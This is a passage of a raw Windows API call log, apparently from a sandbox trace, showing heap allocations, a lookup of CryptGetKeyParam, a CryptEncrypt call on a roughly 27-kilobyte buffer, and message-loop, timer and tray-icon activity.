HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0175.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0175.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0175.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0175.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0175.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0175.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0175.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0175.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0175.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0175.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0175.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0175.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0175.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0175.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0175.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0175.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0175.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0175.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0175.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0175.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0175.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0175.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0175.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0175.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0175.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0175.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0175.883] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0175.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0175.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0175.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.884] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0175.885] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2718, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2718*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0175.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0175.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.886] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.887] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0175.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0175.887] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.887] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.887] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.887] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.887] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.887] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.888] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0175.888] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.888] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0175.888] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.888] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0175.888] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.888] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.888] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.888] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.888] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.889] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x6cc4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x6cd0) returned 1 [0175.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.889] CharLowerBuffW (in: lpsz="byte[27857]", cchLength=0xb | out: lpsz="byte[27857]") returned 0xb [0175.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.890] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.890] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.890] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.891] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.891] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa93688*, pdwDataLen=0x87e820*=0x6cc4, dwBufLen=0x6cd0 | out: pbData=0xa93688*, pdwDataLen=0x87e820*=0x6cd0) returned 1 [0175.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.893] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.893] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.893] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.893] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0175.893] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.914] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0175.914] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 1 [0175.914] TranslateMessage (lpMsg=0x87e98c) returned 0 [0175.915] DispatchMessageW (lpMsg=0x87e98c) returned 0x0 [0175.915] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e028) returned 1 [0175.915] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0175.916] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0175.916] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, 